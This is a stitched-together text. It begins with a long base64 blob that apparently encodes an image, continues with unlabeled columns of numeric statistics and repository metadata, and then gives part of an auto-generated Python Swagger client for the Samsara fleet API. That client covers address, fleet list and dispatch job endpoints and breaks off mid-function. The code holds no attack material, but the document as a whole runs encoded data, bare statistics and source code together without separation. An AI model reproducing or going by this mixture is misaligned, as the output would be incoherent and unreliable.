AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8M////////////////////AH////////////+A/////wAD////////////AH/8AB+AAf///////////gA/wAADgAD///////////weAwAAAIAIf////////gf8CAAAAAAABGPH//////wB+IAAAAAAAAIAA//////4APgAAAAAAAACAAPz////8AA4AAAAAAAAAAAHgP////AAGAAAAAAAAAAADgB////wAAgAAAAAAAAAAAgAf///8AAAAAAAAAAAAAAAAD////AAAAAAAAAAAAAAAAA////wAAAAAAAAAAAAAAAAP///8AAAAAAAAAAAAAAAAD////AAAAAAAAAAAAAAAAB////wAAAAAAAAAAAAAAAAf///+AAAAAAAAAAAAAAAAH////gAAAAAAAAAAAAAAAB////4AAAAAAAAAAAAAAAA/////AAAAAAAAAAAAAAAAP////wAAAAAAAAAAAAAAAH////8AAAAAAAAAAAAAAAB/////gAAAAAAAAAAAAAAA/////4AAAAAAAAAAAAAAAP////+AAAAAAAAAAAAAAAH/////wAAAAAAAAAAAAAAD/////8AAAAAAAAAAAAAAA//////gAAAAAAAAAAAAAAf/////4AAAAAAAAAAAAAAP/////+AAAAAAAAAAAAAAH//////wAAAAAAAAAAAAAB//////8AAAAAAAAAAAAAA///////AAAAAAAAAAAAAAf//////4AAAAAAAAAAAAAH//////+AAAAAAAAAAAAAA///////wAAAAAAAAAAAAAH//////8AAAAAAAAAAAAAB///////AAAAAAAAAAAAAAf//////4AAAAAAAAAAAAA///////+AAAAAAAAAAAAA////////wAAAAAAAAAAAAP///////8AAAAAAAAAAAAH////////gAAAAAAAAAAAB////////4AAAAAAAAAAAA/////////AAAAAAAAAAAAP////////wAAAAAAAAAAAD////////+AAAAAAAAAAAB/////////wAAAAAAAAAAAf////////8AAAAAAAAAAAP/////////gAAAAAAAAAAD/////////4AAAAAAAAAAB//////////AAAAAAAAAAAf/////////4AAAAAAAAAAH//////////AAAAAAAAAAD//////////4AAAAAAAAAA///////////AAAAAAAAAAf//////////8AwAAAAAAAP/////////////wAAAAAAH//////////////AAAAIAB//////////////8AAAHAA///////////////4AAH8Af///////////////wAH/wP/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8='
| 15,038
| 90,206
| 0.913309
| 4,408
| 90,228
| 18.694646
| 0.438748
| 0.002039
| 0.002621
| 0.003653
| 0.027801
| 0.024173
| 0.020168
| 0.016249
| 0.013167
| 0.011747
| 0
| 0.058801
| 0.000089
| 90,228
| 5
| 90,207
| 18,045.6
| 0.854589
| 0.000122
| 0
| 0
| 0
| 1
| 0.999856
| 0.999856
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c7a9658e990780238afba46b4c6aec62dd7d81ee
| 92,847
|
py
|
Python
|
samsara/apis/default_api.py
|
eirerocks/samsara-python-eu
|
e0f1bd8f42d083fc713f910b74123d3bc7408538
|
[
"Apache-2.0"
] | 1
|
2019-09-17T14:11:52.000Z
|
2019-09-17T14:11:52.000Z
|
samsara/apis/default_api.py
|
eirerocks/samsara-python-eu
|
e0f1bd8f42d083fc713f910b74123d3bc7408538
|
[
"Apache-2.0"
] | null | null | null |
samsara/apis/default_api.py
|
eirerocks/samsara-python-eu
|
e0f1bd8f42d083fc713f910b74123d3bc7408538
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Samsara API
# Introduction The Samsara REST API lets you interact with the Samsara Cloud from anything that can send an HTTP request. With the Samsara API you can build powerful applications and custom solutions with sensor data. Samsara has endpoints available to track and analyze sensors, vehicles, and entire fleets. If you’re familiar with what you can build with a REST API, the following API reference guide will be your go-to resource. API access to the Samsara cloud is available to all Samsara administrators. If you’d like to try the API, [contact us](https://www.samsara.com/free-trial). The API is currently in beta and may be subject to frequent changes. # Connecting to the API There are two ways to connect to the API. If you prefer to use the API in Javascript or Python, we supply SDKs which you can download here: [Javascript SDK](https://github.com/samsarahq/samsara-js), [Python SDK](https://github.com/samsarahq/samsara-python). If you’d rather use another language to interact with the Samsara API, the endpoints and examples are in the reference guide below.
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DefaultApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_fleet_address(self, access_token, address_param, **kwargs):
"""
/fleet/add_address
This method adds an address book entry to the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_fleet_address(access_token, address_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param AddressParam address_param: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_fleet_address_with_http_info(access_token, address_param, **kwargs)
else:
(data) = self.add_fleet_address_with_http_info(access_token, address_param, **kwargs)
return data
def add_fleet_address_with_http_info(self, access_token, address_param, **kwargs):
"""
/fleet/add_address
This method adds an address book entry to the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_fleet_address_with_http_info(access_token, address_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param AddressParam address_param: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'address_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_fleet_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `add_fleet_address`")
# verify the required parameter 'address_param' is set
if ('address_param' not in params) or (params['address_param'] is None):
raise ValueError("Missing the required parameter `address_param` when calling `add_fleet_address`")
collection_formats = {}
resource_path = '/fleet/add_address'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'address_param' in params:
body_params = params['address_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_fleet_dispatch_jobs(self, access_token, create_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs/create
Create dispatch jobs in the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_fleet_dispatch_jobs(access_token, create_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param CreateDispatchJobsParam create_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_fleet_dispatch_jobs_with_http_info(access_token, create_dispatch_jobs_param, **kwargs)
else:
(data) = self.create_fleet_dispatch_jobs_with_http_info(access_token, create_dispatch_jobs_param, **kwargs)
return data
def create_fleet_dispatch_jobs_with_http_info(self, access_token, create_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs/create
Create dispatch jobs in the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_fleet_dispatch_jobs_with_http_info(access_token, create_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param CreateDispatchJobsParam create_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'create_dispatch_jobs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_fleet_dispatch_jobs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `create_fleet_dispatch_jobs`")
# verify the required parameter 'create_dispatch_jobs_param' is set
if ('create_dispatch_jobs_param' not in params) or (params['create_dispatch_jobs_param'] is None):
raise ValueError("Missing the required parameter `create_dispatch_jobs_param` when calling `create_fleet_dispatch_jobs`")
collection_formats = {}
resource_path = '/fleet/dispatch_jobs/create'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_dispatch_jobs_param' in params:
body_params = params['create_dispatch_jobs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DispatchJobsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet(self, access_token, group_param, **kwargs):
"""
/fleet/list
Get list of the vehicles. This method returns a list of the vehicles in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_fleet_with_http_info(access_token, group_param, **kwargs)
return data
def get_fleet_with_http_info(self, access_token, group_param, **kwargs):
"""
/fleet/list
Get list of the vehicles. This method returns a list of the vehicles in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_fleet`")
collection_formats = {}
resource_path = '/fleet/list'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_dispatch_jobs(self, access_token, get_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs
Get the dispatch jobs for the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_dispatch_jobs(access_token, get_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GetDispatchJobsParam get_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_dispatch_jobs_with_http_info(access_token, get_dispatch_jobs_param, **kwargs)
else:
(data) = self.get_fleet_dispatch_jobs_with_http_info(access_token, get_dispatch_jobs_param, **kwargs)
return data
def get_fleet_dispatch_jobs_with_http_info(self, access_token, get_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs
Get the dispatch jobs for the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_dispatch_jobs_with_http_info(access_token, get_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GetDispatchJobsParam get_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'get_dispatch_jobs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_dispatch_jobs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_dispatch_jobs`")
